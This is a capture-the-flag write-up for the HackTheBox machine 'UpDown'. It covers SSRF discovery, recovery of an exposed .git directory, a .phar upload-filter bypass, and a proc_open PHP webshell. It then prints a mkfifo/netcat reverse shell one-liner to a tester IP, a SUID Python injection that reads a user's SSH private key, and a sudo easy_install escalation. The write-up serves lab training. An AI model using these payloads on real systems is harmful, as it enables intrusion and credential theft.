CTF-Writeups/HackTheBox/UpDown.md
2023-02-10 17:29:37 +03:00

6.2 KiB

HackTheBox - Updown

NMAP

Nmap scan report for 10.10.11.177
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

The web page has a functionality to check if any site is up also it shows us a domain name siteisup.htb so let's add this in hosts file

With the debug mode enabled we can see the response made on the url which leads to Server Side Request Forgery (SSRF)

I tried using the file protocl to read local file file:///etc/passwd but it was blocked

On the domain name, we can fuzz for subdomains with wfuzz

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://siteisup.htb' -H "Host: FUZZ.siteisup.htb" --hh 1131

This finds a subdomain dev with 403 status code

We can try accessing it through the status check as there exsits SSRF

But it shows that it's down so there maybe some filtering going on dev site, fuzzing for files and directories, it shows /dev but it returns a blank page

So fuzzing at /dev/, we'll find .git

We can downloag .git thourgh wget recursivley with ``--recusrive`

wget --recursive http://10.10.11.177/dev/.git/

After downloading the files, navigate to directory which has .git and run git checkout . to recover the files

Checking changelog.txt it talks about removing the upload option

.htaccess file shows us a header if it's not in the request, the request will be denied

I used a burp extension called Add Custom Header so that on every request the special header gets added

Looking at checker.php file it checks for file extensions which may lead to uploading php files to get code execution

It's checking for all extensions execpt for .phar, but even if we upload it it's going to read the contents of the file, make a request to see if there' 200 status code and it's going to delete the file after making a request to each of the content available in the file

To get code execution, we can make the site make a request to a site which isn't reachable so it's going to try to make a reqeust to that site for sometime and our uploaded file won't get deleted

Foothold

From phpinfo() we can see most of the functions are disabled that could allow command execution, to find out which function can used to get command execution which can use this script https://github.com/teambi0s/dfunc-bypasser

We can abuse proc_open to get command execution

https://www.macs.hw.ac.uk/~hwloidl/docs/PHP/function.proc-open.html

<?php
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("bash", $descriptorspec, $pipes);
if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => writeable handle connected to child stdin
    // 1 => readable handle connected to child stdout
    // Any error output will be appended to /tmp/error-output.txt

    fwrite($pipes[0], "id");
    fclose($pipes[0]);

    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);
    // It is important that you close any pipes before calling
    // proc_close in order to avoid a deadlock
    $return_value = proc_close($process);

    echo "command returned $return_value\n";
}
?>

On uploading the file, we'll get the output of id command

Using nc mkinfo we can get the reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f

Privilege Escalation (developer)

In developer's directory we can find siteisup binary along with it's source code which can run as developer because of SUID

We can exploit this by import os module and executing id command

__import__('os').system('id')

From here we can get the ssh key and login as developer user

__import__('os').system('cat /home/developer/.ssh/id_rsa')

Privilege Escalation (root)

Running sudo -l will show that we can run /usr/local/bin/easy_install as root user

We can abuse this by checking GTFOBINS for the abuse

https://gtfobins.github.io/gtfobins/easy_install/